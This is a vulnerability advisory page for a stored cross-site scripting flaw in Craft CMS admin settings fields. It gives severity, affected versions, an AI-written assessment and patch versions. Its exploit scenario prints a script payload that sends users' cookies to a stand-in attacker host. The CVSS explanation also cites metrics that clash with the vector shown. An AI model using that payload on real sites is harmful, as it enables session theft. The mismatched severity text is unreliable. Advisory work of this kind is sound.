Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Admin credentials required (PR:H), victim must visit affected control panel page (UI:R), and payload executes across user sessions triggering a scope change (S:C).
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
Craft CMS 4.x (>= 4.0.0-RC1, < 4.17.0-beta.1) and 5.x (>= 5.0.0-RC1, < 5.9.0-beta.1) contain multiple stored cross-site scripting vulnerabilities where settings names and field option labels are rendered without sanitization (e.g., via the checkbox.twig template, which used {{ label|raw }}). An authenticated administrator (with allowAdminChanges enabled) can inject malicious payloads into section names, volume names, user group names, global set names, generated field names, checkbox/radio option labels, and custom source labels, causing arbitrary JavaScript to execute in other users' control-panel sessions. Fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
AnalysisAI
Stored XSS in Craft CMS 4.x and 5.x allows an authenticated administrator to persist malicious JavaScript payloads in settings fields - section names, volume names, user group names, global set names, generated field names, checkbox/radio option labels, and custom source labels - that execute in other users' control-panel browser sessions when those pages are visited. The attack surface spans seven distinct injection points across the admin settings UI, all sharing the same root defect in Twig template rendering. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires two explicit preconditions: (1) the attacker must hold administrator-level access to the Craft CMS control panel, and (2) the `allowAdminChanges` configuration option must be set to `true` - Craft CMS's own security documentation recommends disabling this in production environments, making it a non-default production configuration. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 4.6 with PR:H (high privileges required) and UI:A (active user interaction) accurately reflects the constrained attack path: exploitation requires administrator credentials plus a victim admin or editor navigating affected pages. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A malicious or compromised administrator injects a JavaScript session-stealing payload into a section name (e.g., `<script>document.location='https://attacker.example/steal?c='+document.cookie</script>`) via `/admin/settings/sections`. When a second administrator or editor opens the Entries field configuration and views the sources checklist - which renders section names via the unescaped `{{ label|raw }}` Twig filter - the payload executes in their browser, exfiltrating their Craft CMS session token to the attacker. … |
| Remediation | Upgrade Craft CMS 4.x installations to 4.17.0-beta.1 or later, and 5.x installations to 5.9.0-beta.1 or later; these are the first versions containing the fix per confirmed package metadata and patch commits at https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276 and https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. Rated c
Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (iccl
phpKF CMS 3.00 Beta allows unauthenticated PHP file upload by disguising it as a PNG, then renaming it for execution. Po
Deserialization of Untrusted Data in the Sitecore.Security.AntiCSRF (aka anti CSRF) module in Sitecore CMS 7.0 to 7.2 an
Deserialization of Untrusted Data in the anti CSRF module in Sitecore through 9.1 allows an authenticated attacker to ex
SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and earlier allows remote attackers to execute arbitr
Unrestricted file upload vulnerability in hava_upload.php in Havalite CMS 1.1.0 and earlier allows remote attackers to e
Cross-site request forgery (CSRF) vulnerability in Ilch CMS allows remote attackers to hijack the authentication of admi
Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbit
A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.
A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.
A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38159
GHSA-f95g-vm94-46c3